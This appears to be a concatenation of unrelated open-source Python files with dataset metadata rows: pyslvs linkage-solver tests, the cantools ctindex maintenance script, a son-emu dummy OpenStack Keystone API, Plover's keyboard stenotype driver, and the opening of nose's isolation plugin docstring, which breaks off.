# write the final HTML files into the _include/notebooks directory
c.FilesWriter.build_directory = "_includes/notebooks/"
| mit | -4,977,311,403,519,195,000 | 38.238095 | 132 | 0.551106 | false | 4.175676 | false | false | false |
KmolYuan/pyslvs | test/test_core.py | 1 | 3764 | # -*- coding: utf-8 -*-
"""Pyslvs core module test."""
__author__ = "Yuan Chang"
__copyright__ = "Copyright (C) 2016-2021"
__license__ = "AGPL"
__email__ = "[email protected]"
from math import sqrt, radians
from pyslvs import (
Coord, SolverSystem, pxy, ppp, plap, pllp, plpp, palp, expr_solving,
t_config, parse_vpoints, example_list,
)
from . import TestBase
class CoreTest(TestBase):

    def test_pxy(self):
        """pxy: offset a base point by dx/dy."""
        pos = pxy(Coord(80, 90), 40, -20)
        self.assertAlmostEqual(120, pos.x)
        self.assertAlmostEqual(70, pos.y)

    def test_ppp(self):
        """ppp: locate a point from three reference points."""
        pos = ppp(Coord(0, 0), Coord(0, 90), Coord(90, 0))
        self.assertAlmostEqual(90, pos.x)
        self.assertAlmostEqual(90, pos.y)

    def test_plap(self):
        """plap: point from a link length and an absolute angle."""
        pos = plap(Coord(0, 0), 50 * sqrt(2), radians(45), Coord(50, 0))
        self.assertAlmostEqual(50, pos.x)
        self.assertAlmostEqual(50, pos.y)

    def test_pllp(self):
        """pllp: intersection of two links of given lengths."""
        base1 = Coord(-30, 0)
        base2 = Coord(30, 0)
        # regular two-circle intersection
        pos = pllp(base1, 50, 50, base2)
        self.assertAlmostEqual(0, pos.x)
        self.assertAlmostEqual(40, pos.y)
        # circles touch exactly at the midpoint
        pos = pllp(base1, 30, 30, base2)
        self.assertAlmostEqual(pos.x, 0)
        self.assertAlmostEqual(pos.y, 0)
        # degenerate case along the base line
        pos = pllp(base1, 90, 30, base2)
        self.assertAlmostEqual(60, pos.x)
        self.assertAlmostEqual(0, pos.y)

    def test_plpp(self):
        """plpp: point from a link length, a point and a line."""
        pos = plpp(Coord(0, 0), sqrt(5), Coord(0, -3), Coord(3 / 2, 0))
        self.assertAlmostEqual(2, pos.x)
        self.assertAlmostEqual(1, pos.y)

    def test_palp(self):
        """palp: point from an angle, a link length and a point."""
        pos = palp(Coord(0, 0), radians(15), 20, Coord(60, 10))
        self.assertAlmostEqual(42.253221, pos.x, 6)
        self.assertAlmostEqual(19.222356, pos.y, 6)

    def test_solving(self):
        """Test triangular formula solving.

        + Test for PMKS parser.
        + Test data collecting function.
        + Test expression solving function.
        """
        def solve_example(name: str):
            # parse a stock example, configure and solve it, and return
            # the coordinates of the last point
            expr, inputs = example_list(name)
            vpoints = parse_vpoints(expr)
            exprs = t_config(vpoints, inputs)
            result = expr_solving(exprs, vpoints, {pair: 0. for pair in inputs})
            return result[-1]

        x, y = solve_example("Jansen's linkage (Single)")
        self.assertAlmostEqual(-43.170055, x, 6)
        self.assertAlmostEqual(-91.753226, y, 6)
        x, y = solve_example("Crank slider (RP joint)")
        self.assertAlmostEqual(103.801126, x, 6)
        self.assertAlmostEqual(78.393173, y, 6)
        x, y = solve_example("Parallel Linkage")
        self.assertAlmostEqual(200, x, 6)
        self.assertAlmostEqual(0, y, 6)
        # TODO: New test case for Inverted slider

    def test_solving_bfgs(self):
        """Test Sketch Solve kernel."""
        expr, _ = example_list("Jansen's linkage (Single)")
        solver = SolverSystem(parse_vpoints(expr), {(0, 1): 0.})
        x, y = solver.solve()[7]
        self.assertAlmostEqual(-43.170055, x, 6)
        self.assertAlmostEqual(-91.753226, y, 6)
        # Test if angle value changed
        solver.set_inputs({(0, 1): 45.})
        x, y = solver.solve()[7]
        self.assertAlmostEqual(-24.406394, x, 6)
        self.assertAlmostEqual(-91.789596, y, 6)
        # Test if link length changed
        solver.set_data({(0, 1): 16.})
        x, y = solver.solve()[7]
        self.assertAlmostEqual(-24.117994, x, 6)
        self.assertAlmostEqual(-91.198072, y, 6)
| agpl-3.0 | -3,383,056,336,825,432,600 | 33.53211 | 80 | 0.582359 | false | 3.328028 | true | false | false |
bubbleboy14/cantools | cantools/scripts/index.py | 1 | 8655 | """
### Usage: ctindex [--mode=MODE] [--domain=DOMAIN] [--port=PORT] [--skip=SKIP]
### Options:
-h, --help show this help message and exit
-m MODE, --mode=MODE may be: 'refcount' (default - count up all foreignkey
references for sort orders and such); 'index' (assign
each record a sequential integer index); 'urlsafekeys'
(update all key/keylist properties to use urlsafe keys
introduced in ct 0.8); 'cleanup' (delete zero-count
reference counters). Note regarding 'index' mode: it
_must_ happen remotely; it's generally unnecessary
unless you're trying to migrate an unindexed database
away from gae and need an index/key per record; it
should be invoked from _outside_ -- that's right,
outside -- of your project's directory (to avoid
loading up a bunch of google network tools that may be
crappy or cause issues outside of their normal
'dev_appserver' environment)
-d DOMAIN, --domain=DOMAIN
('index' mode only) what's the domain of the target
server? (default: localhost)
-p PORT, --port=PORT ('index' mode only) what's the port of the target
server? (default: 8080)
-s SKIP, --skip=SKIP skip these tables ('index' mode only) - use '|' as
separator, such as 'table1|table2|table3' (default:
none)
-i INDEX, --index=INDEX
start with this index ('index' mode only) (default: 0)
As you can see, this script's behavior changes according to the backend of the target project.
### dez
Run this if your CTRefCount records get messed up for
some reason. It will go through and recount everything
(in the default 'refcount' mode -- the other modes,
'urlsafekeys' and 'cleanup', are for migrating a CT-mediated
database from an older deployment to CT 0.8 or newer).
### gae
Run this in 'index' mode on a database with lots of missing index values.
"""
from getpass import getpass
from optparse import OptionParser
from cantools.util import error, log, batch
from cantools.db import get_schema, get_model, put_multi, delete_multi, unpad_key
from cantools.web import fetch
from cantools import config
# dez-only imports: only the dez backend exposes a SQL session and the
# refresh_counter helper used by refcount mode
if config.web.server == "dez":
    from cantools.db import session, func, refresh_counter

try:
    input = raw_input # py2/3 compatibility
except NameError:
    pass

# running totals keyed by "<table>.<property>" reference; the special
# '_counters' slot tracks how many CTRefCount rows were written
counts = { "_counters": 0 }
# max retries per table in 'index' mode before giving up
RETRIES = 5

#
# dez
#
def get_keys(kind, reference):
    """Return the keys of every `kind` row that is targetted at least once
    by the foreignkey `reference` ("table.property")."""
    log("acquiring %s (%s) keys"%(kind, reference), 1)
    model_cls = get_model(kind)
    query = session.query(getattr(model_cls, "key"))
    total = query.count()
    log("found %s"%(total,), 2)
    ref_table, ref_field = reference.split(".")
    ref_prop = getattr(get_model(ref_table), ref_field)
    # group the referencing table by the foreignkey column, then join so
    # only keys that are actually referenced remain
    grouped = session.query(
        ref_prop, func.count("*").label("sub_count")).group_by(ref_prop).subquery()
    query = query.join(grouped, model_cls.key == getattr(grouped.c, ref_field))
    remaining = query.count()
    log("filtering out %s untargetted entities"%(total - remaining), 2)
    total = remaining
    log("returning %s keys"%(total,), 2)
    return query.all()
def refmap():
    """Build {kind: {reference: [keys]}} covering every foreignkey property
    declared in the schema (wildcard targets are ignored)."""
    log("compiling back reference map")
    rmap = {}
    for table, tschema in list(get_schema().items()):
        for prop, kinds in list(tschema["_kinds"].items()):
            reference = "%s.%s"%(table, prop)
            counts[reference] = 0
            targets = [k for k in kinds if k != "*"] # skip wildcard for now
            for kind in targets:
                rmap.setdefault(kind, {})[reference] = get_keys(kind, reference)
    return rmap
def do_batch(chunk, reference):
    """Refresh the reference counters behind one batch of keys and record
    progress in the module-level `counts` totals."""
    log("refreshing %s %s keys"%(len(chunk), reference), 1)
    refreshed = []
    for done, item in enumerate(chunk, start=1): # item is single-member tuple
        refreshed.append(refresh_counter(item[0], reference))
        if not done % 100:
            log("processed %s"%(done,), 3)
    counts[reference] += len(chunk)
    counts["_counters"] += len(refreshed)
    log("refreshed %s total"%(counts[reference],), 2)
    log("updated %s counters"%(counts["_counters"],), 2)
    put_multi(refreshed)
    log("saved", 2)
def refcount():
    """Recount every foreignkey reference in the database ('refcount' mode)."""
    log("indexing foreignkey references throughout database", important=True)
    import model # load schema
    for kind, refs in list(refmap().items()):
        log("processing table: %s"%(kind,), important=True)
        for reference, keys in list(refs.items()):
            batch(keys, do_batch, reference)
    total_rows = sum(counts.values()) - counts["_counters"]
    log("refreshed %s rows and updated %s counters"%(total_rows, counts["_counters"]), important=True)
#
# gae
#
def _log_fetch(host, url, port):
    """Fetch `url` from host:port, log the reply, and return it."""
    reply = fetch(host, url, port)
    log(reply)
    return reply
def _index_kind(kind, host, port, pw, index):
    """Trigger remote indexing of one table, retrying up to RETRIES times
    before bailing out via error()."""
    log("indexing %s"%(kind,), important=True)
    attempt = 0
    url = "/_db?action=index&pw=%s&kind=%s&index=%s"%(pw, kind, index)
    # the remote endpoint reports failures in the response body
    while "Error" in _log_fetch(host, url, port):
        log("error indexing %s"%(kind,), important=True)
        if attempt == RETRIES:
            error("tried %s times! sorry."%(attempt,))
        attempt += 1
        log("trying again (retry: %s)"%(attempt,))
def index(host, port, skips, index):
    """Remotely index every table in the target server's schema ('index'
    mode), skipping any table named in `skips`."""
    pw = getpass("what's the admin password? ")
    log("indexing db at %s:%s"%(host, port), important=True)
    log("acquiring schema")
    schema = fetch(host, "/_db?action=schema", port, ctjson=True)
    for kind in schema:
        if kind in skips:
            log("skipping %s"%(kind,), important=True)
            continue
        _index_kind(kind, host, port, pw, index)
#
# url safety
#
def urlsafe():
    """Rewrite every record's key plus all key/keylist properties to the
    urlsafe key format introduced in CT 0.8 (one-off migration helper)."""
    log("updating key/keylist properties with urlsafe keys", important=True)
    import model  # load schema
    schema = get_schema()
    puts = []
    for mod in schema:
        mods = get_model(mod).query().all()
        log("%s (%s)"%(mod, len(mods)), 1)
        for m in mods:
            if m.polytype != mod:
                # polymorphic child records are processed under their own kind
                log("skipping! (%s != %s)"%(m.polytype, mod), 2)
                continue
            # convert the record's own key, then every foreignkey property
            m.key = unpad_key(m.key.urlsafe())
            for prop in schema[mod]["_kinds"]:
                if schema[mod][prop] == "key":
                    setattr(m, prop, unpad_key(getattr(m, prop).urlsafe()))
                else: # keylist
                    setattr(m, prop, [unpad_key(k.urlsafe()) for k in getattr(m, prop)])
            puts.append(m)
    log("saving records")
    put_multi(puts)
    log("updated %s keys"%(len(puts),), important=True)
    # optionally chain into cleanup mode
    if input("want to prune zero-count reference counters? (y/N)").lower().startswith("y"):
        cleanup()
def cleanup():
    """Delete every CTRefCount row whose count has dropped to zero
    ('cleanup' mode)."""
    log("cleaning up zero-count reference counters", important=True)
    from cantools.db import lookup
    stale = lookup.CTRefCount.query(lookup.CTRefCount.count == 0).all()
    log("deleting %s zero-count reference counters"%(len(stale),))
    delete_multi(stale)
    log("all gone!")
def go():
    """Command line entry point: parse options and dispatch to the selected
    maintenance mode (refcount / index / urlsafekeys / cleanup)."""
    parser = OptionParser("ctindex [--mode=MODE] [--domain=DOMAIN] [--port=PORT] [--skip=SKIP]")
    parser.add_option("-m", "--mode", dest="mode", default="refcount",
        help="may be: 'refcount' (default - count up all foreignkey references for sort "
            "orders and such); 'index' (assign each record a sequential integer index); "
            "'urlsafekeys' (update all key/keylist properties to use urlsafe keys "
            "introduced in ct 0.8); 'cleanup' (delete zero-count reference counters). "
            "Note regarding 'index' mode: it _must_ happen remotely; it's generally "
            "unnecessary unless you're trying to migrate an unindexed database away from "
            "gae and need an index/key per record; it should be invoked from _outside_ "
            "-- that's right, outside -- of your project's directory (to avoid loading "
            "up a bunch of google network tools that may be crappy or cause issues outside "
            "of their normal 'dev_appserver' environment)")
    parser.add_option("-d", "--domain", dest="domain", default="localhost",
        help="('index' mode only) what's the domain of the target server? (default: localhost)")
    parser.add_option("-p", "--port", dest="port", default="8080",
        help="('index' mode only) what's the port of the target server? (default: 8080)")
    parser.add_option("-s", "--skip", dest="skip", default="",
        help="skip these tables ('index' mode only) - use '|' as separator, such as 'table1|table2|table3' (default: none)")
    parser.add_option("-i", "--index", dest="index", default=0,
        help="start with this index ('index' mode only) (default: 0)")
    options, args = parser.parse_args()
    log("mode: %s"%(options.mode,), important=True)
    if options.mode == "refcount":
        refcount()
    elif options.mode == "index":
        # optparse delivers the port as a string; the skip list is
        # '|'-separated and may be empty
        index(options.domain, int(options.port),
            options.skip and options.skip.split("|") or [], options.index)
    elif options.mode == "urlsafekeys":
        urlsafe()
    elif options.mode == "cleanup":
        cleanup()
    else:
        error("unknown mode: %s"%(options.mode,))
    log("goodbye")
# Script entry point. NOTE: line restored -- the original had dataset
# metadata residue fused onto the `go()` call, which is a syntax error.
if __name__ == "__main__":
    go()
mpeuster/son-emu | src/emuvim/api/openstack/openstack_dummies/keystone_dummy_api.py | 1 | 16828 | # Copyright (c) 2015 SONATA-NFV and Paderborn University
# ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Neither the name of the SONATA-NFV, Paderborn University
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# This work has been performed in the framework of the SONATA project,
# funded by the European Commission under Grant number 671517 through
# the Horizon 2020 and 5G-PPP programmes. The authors would like to
# acknowledge the contributions of their colleagues of the SONATA
# partner consortium (www.sonata-nfv.eu).
from flask_restful import Resource
from flask import request, Response
from emuvim.api.openstack.openstack_dummies.base_openstack_dummy import BaseOpenstackDummy
from emuvim.api.openstack.helper import get_host
import logging
import json
LOG = logging.getLogger("api.openstack.keystone")
class KeystoneDummyApi(BaseOpenstackDummy):
    """Flask-RESTful API emulating a minimal OpenStack Keystone service."""

    def __init__(self, in_ip, in_port):
        # in_ip/in_port: listen address. Each resource gets a back reference
        # to this API instance ('api' kwarg) so it can advertise endpoints
        # derived from self.api.port.
        super(KeystoneDummyApi, self).__init__(in_ip, in_port)

        self.api.add_resource(KeystoneListVersions, "/",
                              resource_class_kwargs={'api': self})
        self.api.add_resource(KeystoneShowAPIv2, "/v2.0",
                              resource_class_kwargs={'api': self})
        self.api.add_resource(KeystoneGetToken, "/v2.0/tokens",
                              resource_class_kwargs={'api': self})
        self.api.add_resource(KeystoneShowAPIv3, "/v3.0",
                              resource_class_kwargs={'api': self})
        self.api.add_resource(
            KeystoneGetTokenv3, "/v3.0/auth/tokens", resource_class_kwargs={'api': self})
class KeystoneListVersions(Resource):
    """
    List all known keystone versions.

    Hardcoded for our version!
    """

    def __init__(self, api):
        self.api = api

    def get(self):
        """
        List API versions.

        :return: Returns the api versions.
        :rtype: :class:`flask.response` containing a static json encoded dict.
        """
        LOG.debug("API CALL: %s GET" % str(self.__class__.__name__))
        # single hardcoded v2.0 entry pointing back at this server
        version_v2 = {
            "id": "v2.0",
            "links": [
                {
                    "href": "http://%s:%d/v2.0" % (get_host(request), self.api.port),
                    "rel": "self"
                }
            ],
            "media-types": [
                {
                    "base": "application/json",
                    "type": "application/vnd.openstack.identity-v2.0+json"
                }
            ],
            "status": "stable",
            "updated": "2014-04-17T00:00:00Z"
        }
        resp = {"versions": {"values": [version_v2]}}
        return Response(json.dumps(resp), status=200,
                        mimetype='application/json')
class KeystoneShowAPIv2(Resource):
    """
    Entrypoint for all openstack clients.

    This returns all current entrypoints running on son-emu.
    """

    def __init__(self, api):
        # api: owning KeystoneDummyApi; provides the advertised port
        self.api = api

    def get(self):
        """
        List API entrypoints.

        :return: Returns an openstack style response for all entrypoints.
        :rtype: :class:`flask.response`
        """
        LOG.debug("API CALL: %s GET" % str(self.__class__.__name__))
        # neutron_port = self.api.port + 4696
        # heat_port = self.api.port + 3004

        # static v2.0 identity descriptor with a self link back to this host
        resp = dict()
        resp['version'] = {
            "status": "stable",
            "media-types": [
                {
                    "base": "application/json",
                    "type": "application/vnd.openstack.identity-v2.0+json"
                }
            ],
            "id": "v2.0",
            "links": [
                {
                    "href": "http://%s:%d/v2.0" % (get_host(request), self.api.port),
                    "rel": "self"
                }
            ]
        }
        LOG.debug(json.dumps(resp))
        return Response(json.dumps(resp), status=200,
                        mimetype='application/json')
class KeystoneShowAPIv3(Resource):
    """
    Entrypoint for all openstack clients.

    This returns all current entrypoints running on son-emu.
    """

    def __init__(self, api):
        self.api = api

    def get(self):
        """
        List API entrypoints.

        :return: Returns an openstack style response for all entrypoints.
        :rtype: :class:`flask.response`
        """
        LOG.debug("API CALL: %s GET" % str(self.__class__.__name__))
        # static v3.0 identity descriptor with a self link back to this host
        self_link = "http://%s:%d/v3.0" % (get_host(request), self.api.port)
        resp = {
            "version": {
                "status": "stable",
                "media-types": [
                    {
                        "base": "application/json",
                        "type": "application/vnd.openstack.identity-v3.0+json"
                    }
                ],
                "id": "v3.0",
                "links": [
                    {
                        "href": self_link,
                        "rel": "self"
                    }
                ]
            }
        }
        return Response(json.dumps(resp), status=200,
                        mimetype='application/json')
class KeystoneGetToken(Resource):
    """
    Returns a static keystone token.

    We don't do any validation so we don't care.
    """

    def __init__(self, api):
        # api: owning KeystoneDummyApi; its port anchors the service catalog
        self.api = api

    def post(self):
        """
        Issue a hardcoded v2.0 token plus the emulated service catalog.

        This is hardcoded. For a working "authentication" use these ENVVARS:

        * OS_AUTH_URL=http://<ip>:<port>/v2.0
        * OS_IDENTITY_API_VERSION=2.0
        * OS_TENANT_ID=fc394f2ab2df4114bde39905f800dc57
        * OS_REGION_NAME=RegionOne
        * OS_USERNAME=bla
        * OS_PASSWORD=bla

        :return: Returns an openstack style response for all entrypoints.
        :rtype: :class:`flask.response`
        """
        LOG.debug("API CALL: %s POST" % str(self.__class__.__name__))
        try:
            ret = dict()
            req = json.loads(request.data)
            ret['access'] = dict()
            ret['access']['token'] = dict()
            token = ret['access']['token']

            # static validity window: tokens effectively never expire here
            token['issued_at'] = "2014-01-30T15:30:58.819Z"
            token['expires'] = "2999-01-30T15:30:58.819Z"
            # echo back the client-provided token/tenant ids if present,
            # otherwise fall back to a fixed dummy id
            token['id'] = req['auth'].get(
                'token', {'id': 'fc394f2ab2df4114bde39905f800dc57'}).get('id')
            token['tenant'] = dict()
            token['tenant']['description'] = None
            token['tenant']['enabled'] = True
            token['tenant']['id'] = req['auth'].get(
                'tenantId', 'fc394f2ab2df4114bde39905f800dc57')
            token['tenant']['name'] = "tenantName"

            ret['access']['user'] = dict()
            user = ret['access']['user']
            user['username'] = req.get('username', "username")
            user['name'] = "tenantName"
            user['roles_links'] = list()
            user['id'] = token['tenant'].get(
                'id', "fc394f2ab2df4114bde39905f800dc57")
            user['roles'] = [{'name': 'Member'}]
            ret['access']['region_name'] = "RegionOne"

            # service catalog: every emulated service points back at son-emu,
            # using fixed port offsets relative to the keystone port
            ret['access']['serviceCatalog'] = [{
                "endpoints": [
                    {
                        "adminURL": "http://%s:%s/v2.1/%s" % (get_host(request), self.api.port + 3774, user['id']),
                        "region": "RegionOne",
                        "internalURL": "http://%s:%s/v2.1/%s" % (get_host(request), self.api.port + 3774, user['id']),
                        "id": "2dad48f09e2a447a9bf852bcd93548ef",
                        "publicURL": "http://%s:%s/v2.1/%s" % (get_host(request), self.api.port + 3774, user['id'])
                    }
                ],
                "endpoints_links": [],
                "type": "compute",
                "name": "nova"
            }, {
                "endpoints": [
                    {
                        "adminURL": "http://%s:%s/v2.0" % (get_host(request), self.api.port),
                        "region": "RegionOne",
                        "internalURL": "http://%s:%s/v2.0" % (get_host(request), self.api.port),
                        "id": "2dad48f09e2a447a9bf852bcd93543fc",
                        "publicURL": "http://%s:%s/v2" % (get_host(request), self.api.port)
                    }
                ],
                "endpoints_links": [],
                "type": "identity",
                "name": "keystone"
            }, {
                "endpoints": [
                    {
                        "adminURL": "http://%s:%s" % (get_host(request), self.api.port + 4696),
                        "region": "RegionOne",
                        "internalURL": "http://%s:%s" % (get_host(request), self.api.port + 4696),
                        "id": "2dad48f09e2a447a9bf852bcd93548cf",
                        "publicURL": "http://%s:%s" % (get_host(request), self.api.port + 4696)
                    }
                ],
                "endpoints_links": [],
                "type": "network",
                "name": "neutron"
            }, {
                "endpoints": [
                    {
                        "adminURL": "http://%s:%s" % (get_host(request), self.api.port + 4242),
                        "region": "RegionOne",
                        "internalURL": "http://%s:%s" % (get_host(request), self.api.port + 4242),
                        "id": "2dad48f09e2a447a9bf852bcd93548cf",
                        "publicURL": "http://%s:%s" % (get_host(request), self.api.port + 4242)
                    }
                ],
                "endpoints_links": [],
                "type": "image",
                "name": "glance"
            }, {
                "endpoints": [
                    {
                        "adminURL": "http://%s:%s/v1/%s" % (get_host(request), self.api.port + 3004, user['id']),
                        "region": "RegionOne",
                        "internalURL": "http://%s:%s/v1/%s" % (get_host(request), self.api.port + 3004, user['id']),
                        "id": "2dad48f09e2a447a9bf852bcd93548bf",
                        "publicURL": "http://%s:%s/v1/%s" % (get_host(request), self.api.port + 3004, user['id'])
                    }
                ],
                "endpoints_links": [],
                "type": "orchestration",
                "name": "heat"
            }]

            # BUGFIX: the original assignment ended with a stray trailing
            # comma, turning the metadata value into a one-element tuple
            # containing the dict instead of the dict itself.
            ret['access']["metadata"] = {
                "is_admin": 0,
                "roles": [
                    "7598ac3c634d4c3da4b9126a5f67ca2b"
                ]
            }
            ret['access']['trust'] = {
                "id": "394998fa61f14736b1f0c1f322882949",
                "trustee_user_id": "269348fdd9374b8885da1418e0730af1",
                "trustor_user_id": "3ec3164f750146be97f21559ee4d9c51",
                "impersonation": False
            }
            return Response(json.dumps(ret), status=200,
                            mimetype='application/json')

        except Exception as ex:
            # use the module logger and str(ex): Exception.message does not
            # exist in Python 3
            LOG.exception("Keystone: Get token failed.")
            return str(ex), 500
class KeystoneGetTokenv3(Resource):
    """
    Returns a static keystone token.

    We don't do any validation so we don't care.
    """

    def __init__(self, api):
        # api: owning KeystoneDummyApi; its port anchors the service catalog
        self.api = api

    def post(self):
        """
        Issue a hardcoded v3 token plus the emulated service catalog.

        This is hardcoded. For a working "authentication" use these ENVVARS:

        * OS_AUTH_URL=http://<ip>:<port>/v3
        * OS_IDENTITY_API_VERSION=2.0
        * OS_TENANT_ID=fc394f2ab2df4114bde39905f800dc57
        * OS_REGION_NAME=RegionOne
        * OS_USERNAME=bla
        * OS_PASSWORD=bla

        :return: Returns an openstack style response for all entrypoints.
        :rtype: :class:`flask.response`
        """
        LOG.debug("API CALL: %s POST" % str(self.__class__.__name__))
        try:
            ret = dict()
            req = json.loads(request.data)
            ret['token'] = dict()
            token = ret['token']

            # static validity window: tokens effectively never expire here
            token['issued_at'] = "2014-01-30T15:30:58.819Z"
            token['expires_at'] = "2999-01-30T15:30:58.819Z"
            token['methods'] = ["password"]
            token['extras'] = dict()
            token['user'] = dict()
            user = token['user']
            # echo back a client-provided token id if present, otherwise
            # fall back to a fixed dummy id
            user['id'] = req['auth'].get(
                'token', {'id': 'fc394f2ab2df4114bde39905f800dc57'}).get('id')
            user['name'] = "tenantName"
            user['password_expires_at'] = None
            user['domain'] = {"id": "default", "name": "Default"}
            token['audit_ids'] = ["ZzZwkUflQfygX7pdYDBCQQ"]

            # project
            token['project'] = {
                "domain": {
                    "id": "default",
                    "name": "Default"
                },
                "id": "8538a3f13f9541b28c2620eb19065e45",
                "name": "tenantName"
            }

            # catalog: every emulated service points back at son-emu, using
            # fixed port offsets relative to the keystone port
            token['catalog'] = [{
                "endpoints": [
                    {
                        "url": "http://%s:%s/v2.1/%s" % (get_host(request), self.api.port + 3774, user['id']),
                        "region": "RegionOne",
                        "interface": "public",
                        "id": "2dad48f09e2a447a9bf852bcd93548ef"
                    }
                ],
                "id": "2dad48f09e2a447a9bf852bcd93548ef",
                "type": "compute",
                "name": "nova"
            }, {
                "endpoints": [
                    {
                        "url": "http://%s:%s/v2.0" % (get_host(request), self.api.port),
                        "region": "RegionOne",
                        "interface": "public",
                        "id": "2dad48f09e2a447a9bf852bcd93543fc"
                    }
                ],
                "id": "2dad48f09e2a447a9bf852bcd93543fc",
                "type": "identity",
                "name": "keystone"
            }, {
                "endpoints": [
                    {
                        "url": "http://%s:%s" % (get_host(request), self.api.port + 4696),
                        "region": "RegionOne",
                        "interface": "public",
                        "id": "2dad48f09e2a447a9bf852bcd93548cf"
                    }
                ],
                "id": "2dad48f09e2a447a9bf852bcd93548cf",
                "type": "network",
                "name": "neutron"
            }, {
                "endpoints": [
                    {
                        "url": "http://%s:%s" % (get_host(request), self.api.port + 4242),
                        "region": "RegionOne",
                        "interface": "public",
                        "id": "2dad48f09e2a447a9bf852bcd93548cf"
                    }
                ],
                "id": "2dad48f09e2a447a9bf852bcd93548cf",
                "type": "image",
                "name": "glance"
            }, {
                "endpoints": [
                    {
                        "url": "http://%s:%s/v1/%s" % (get_host(request), self.api.port + 3004, user['id']),
                        "region": "RegionOne",
                        "interface": "public",
                        "id": "2dad48f09e2a447a9bf852bcd93548bf"
                    }
                ],
                "id": "2dad48f09e2a447a9bf852bcd93548bf",
                "type": "orchestration",
                "name": "heat"
            }]

            return Response(json.dumps(ret), status=201,
                            mimetype='application/json')

        except Exception as ex:
            # use the module logger and str(ex): Exception.message does not
            # exist in Python 3
            LOG.exception("Keystone: Get token failed.")
            return str(ex), 500
| apache-2.0 | -1,443,519,102,164,560,100 | 35.822757 | 120 | 0.455253 | false | 4 | false | false | false |
arpadpe/plover | plover/machine/keyboard.py | 1 | 4230 | # Copyright (c) 2010 Joshua Harlan Lifton.
# See LICENSE.txt for details.
"For use with a computer keyboard (preferably NKRO) as a steno machine."
from plover.machine.base import StenotypeBase
from plover.oslayer.keyboardcontrol import KeyboardCapture
class Keyboard(StenotypeBase):
    """Standard stenotype interface for a computer keyboard.

    This class implements the three methods necessary for a standard
    stenotype interface: start_capture, stop_capture, and
    add_callback.
    """

    KEYS_LAYOUT = KeyboardCapture.SUPPORTED_KEYS_LAYOUT
    # extra pseudo-action on top of the base set: the arpeggiate trigger key
    ACTIONS = StenotypeBase.ACTIONS + ('arpeggiate',)

    def __init__(self, params):
        """Monitor the keyboard's events.

        params -- machine configuration dict; only 'arpeggiate' is read.
        """
        super(Keyboard, self).__init__()
        self.arpeggiate = params['arpeggiate']
        # keyboard key name -> steno key; a None value means "suppress the
        # key but produce no steno output"
        self._bindings = {}
        # steno keys pressed since the current stroke started
        self._down_keys = set()
        # steno keys already released again during the current stroke
        self._released_keys = set()
        self._keyboard_capture = None
        # number of bound key presses in the current stroke; used to emit
        # the right number of backspaces when the stroke is suppressed
        self._last_stroke_key_down_count = 0
        self._update_bindings()

    def _update_bindings(self):
        # Rebuild the key -> steno-key map from the current keymap.
        self._bindings = dict(self.keymap.get_bindings())
        for key, mapping in list(self._bindings.items()):
            if 'no-op' == mapping:
                # captured (suppressed) but produces no steno key
                self._bindings[key] = None
            elif 'arpeggiate' == mapping:
                if self.arpeggiate:
                    self._bindings[key] = None
                    self._arpeggiate_key = key
                else:
                    # Don't suppress arpeggiate key if it's not used.
                    del self._bindings[key]

    def set_mappings(self, mappings):
        # Refresh the binding table whenever the keymap changes.
        super(Keyboard, self).set_mappings(mappings)
        self._update_bindings()

    def start_capture(self):
        """Begin listening for output from the stenotype machine."""
        self._released_keys.clear()
        self._last_stroke_key_down_count = 0
        self._initializing()
        try:
            self._keyboard_capture = KeyboardCapture()
            self._keyboard_capture.key_down = self._key_down
            self._keyboard_capture.key_up = self._key_up
            self._keyboard_capture.start()
        except:
            self._error()
            raise
        self._ready()

    def stop_capture(self):
        """Stop listening for output from the stenotype machine."""
        if self._keyboard_capture is not None:
            self._keyboard_capture.cancel()
            self._keyboard_capture = None
        self._stopped()

    def set_suppression(self, enabled):
        # Suppress only bound keys so unbound keys still reach the OS.
        suppressed_keys = self._bindings.keys() if enabled else ()
        self._keyboard_capture.suppress_keyboard(suppressed_keys)

    def suppress_last_stroke(self, send_backspaces):
        # Undo the characters the last stroke's bound key presses produced.
        send_backspaces(self._last_stroke_key_down_count)

    def _key_down(self, key):
        """Called when a key is pressed."""
        assert key is not None
        if key in self._bindings:
            self._last_stroke_key_down_count += 1
        steno_key = self._bindings.get(key)
        if steno_key is not None:
            self._down_keys.add(steno_key)

    def _key_up(self, key):
        """Called when a key is released."""
        assert key is not None
        steno_key = self._bindings.get(key)
        if steno_key is not None:
            # Process the newly released key.
            self._released_keys.add(steno_key)
            # Remove invalid released keys.
            self._released_keys = self._released_keys.intersection(self._down_keys)
        # A stroke is complete if all pressed keys have been released.
        # If we are in arpeggiate mode then only send stroke when spacebar is pressed.
        send_strokes = bool(self._down_keys and
                            self._down_keys == self._released_keys)
        if self.arpeggiate:
            send_strokes &= key == self._arpeggiate_key
        if send_strokes:
            steno_keys = list(self._down_keys)
            if steno_keys:
                # reset stroke state before notifying listeners
                self._down_keys.clear()
                self._released_keys.clear()
                self._notify(steno_keys)
            self._last_stroke_key_down_count = 0

    @classmethod
    def get_option_info(cls):
        """Describe supported machine options: name -> (default, converter)."""
        bool_converter = lambda s: s == 'True'
        return {
            'arpeggiate': (False, bool_converter),
        }
| gpl-2.0 | -4,720,774,508,469,126,000 | 35.153846 | 86 | 0.591253 | false | 3.960674 | false | false | false |
santisiri/popego | envs/ALPHA-POPEGO/lib/python2.5/site-packages/nose-0.10.1-py2.5.egg/nose/plugins/isolate.py | 1 | 3674 | """Use the isolation plugin with --with-isolation or the
NOSE_WITH_ISOLATION environment variable to clean sys.modules after
each test module is loaded and executed.
The isolation module is in effect similar to wrapping the following
functions around the import and execution of each test module::
def setup(module):
module._mods = sys.modules.copy()
def teardown(module):
to_del = [ m for m in sys.modules.keys() if m not in
module._mods ]
for mod in to_del:
del sys.modules[mod]
sys.modules.update(module._mods)
Isolation works only during lazy loading. In normal use, this is only
during discovery of modules within a directory, where the process of
importing, loading tests and running tests from each module is
encapsulated in a single loadTestsFromName call. This plugin
implements loadTestsFromNames to force the same lazy-loading there,
which allows isolation to work in directed mode as well as discovery,
at the cost of some efficiency: lazy-loading names forces full context
